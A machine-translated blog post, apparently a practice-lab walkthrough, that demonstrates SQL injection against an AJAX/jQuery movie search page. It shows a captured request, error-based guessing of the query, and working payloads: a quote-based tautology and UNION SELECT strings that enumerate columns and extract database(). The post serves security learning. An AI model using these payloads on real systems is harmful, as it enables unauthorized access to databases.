当前位置:网站首页>SQL Injection (AJAX/JSON/jQuery)
SQL Injection (AJAX/JSON/jQuery)
2022-07-03 13:45:00 【this is hhhhp】
1.AJAX/JSON/jQuery
(1)AJAX
Through a small amount of data exchange with the server in the background ,AJAX Asynchronous update of web pages . This means that you can load the entire page without reloading it , Update a part of the web page in real time .
(2)JSON
JSON (JavaScript Object Notation) Is a lightweight data exchange format .
Is a data format .
(3)jQuery
jQuery It's a JavaScript library , Use jQuery Not only will it take a lot of JavaScript Code to achieve the function reduced to a few lines of code , It also provides enough high-speed performance , It's a skill that every website developer should master .
2. Inject
Let's grab a bag first :
Enter... In the input box i

Bag caught :

first line ,title=i, Change to ' have a look :
sql Wrong report , guess sql The statement is as follows :
select * from Table name where Title like '%". User input ."%'

So it can be constructed like this sql sentence :
select * from Table name where Title like '%"' or '"%
The inquiry is correct , All the movies are

On this basis, inject :
0' union select 1,2,3,4,5,6,7 'obtain 2,3,4,5, altogether 4 Displayable bits

Blast storage :
0' union select 1,database(),3,4,5,6,7 ' 
Just behind GET/Search About the same .
边栏推荐
- 【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
- Flutter动态化 | Fair 2.5.0 新版本特性
- windos 创建cordova 提示 因为在此系统上禁止运行脚本
- AI 考高数得分 81,网友:AI 模型也免不了“内卷”!
- MySQL_ JDBC
- Mycms we media mall v3.4.1 release, user manual update
- [today in history] July 3: ergonomic standards act; The birth of pioneers in the field of consumer electronics; Ubisoft releases uplay
- rxjs Observable filter Operator 的实现原理介绍
- Unity Render Streaming通过Js与Unity自定义通讯
- User and group command exercises
猜你喜欢

Several common optimization methods matlab principle and depth analysis

SQL Injection (POST/Search)

今日睡眠质量记录77分
![[quantitative trading] permanent portfolio, turtle trading rules reading, back testing and discussion](/img/3b/28327bbf5eb19254f03500a41e2adb.jpg)
[quantitative trading] permanent portfolio, turtle trading rules reading, back testing and discussion

Internet of things completion -- (stm32f407 connects to cloud platform detection data)

掌握Cypress命令行选项,是真正掌握Cypress的基础

研发团队资源成本优化实践

Brief analysis of tensorboard visual processing cases
![[sort] bucket sort](/img/52/95514b5a70cea75821883e016d8adf.jpg)
[sort] bucket sort

Mycms we media mall v3.4.1 release, user manual update
随机推荐
Tutoriel PowerPoint, comment enregistrer une présentation sous forme de vidéo dans Powerpoint?
Father and basketball
MapReduce implements matrix multiplication - implementation code
Static linked list (subscript of array instead of pointer)
SQL Injection (GET/Select)
IBEM 数学公式检测数据集
Spark实战1:单节点本地模式搭建Spark运行环境
Kivy教程之 如何通过字符串方式载入kv文件设计界面(教程含源码)
Which securities company has the lowest Commission for opening an account online? I want to open an account. Is it safe for the online account manager to open an account
The network card fails to start after the cold migration of the server hard disk
Unity render streaming communicates with unity through JS
R语言使用data函数获取当前R环境可用的示例数据集:获取datasets包中的所有示例数据集、获取所有包的数据集、获取特定包的数据集
MySQL
Convolution emotion analysis task4
Universal dividend source code, supports the dividend of any B on the BSC
Students who do not understand the code can also send their own token, which is easy to learn BSC
Several common optimization methods matlab principle and depth analysis
HALCON联合C#检测表面缺陷——HALCON例程autobahn
常见的几种最优化方法Matlab原理和深度分析
The reasons why there are so many programming languages in programming internal skills
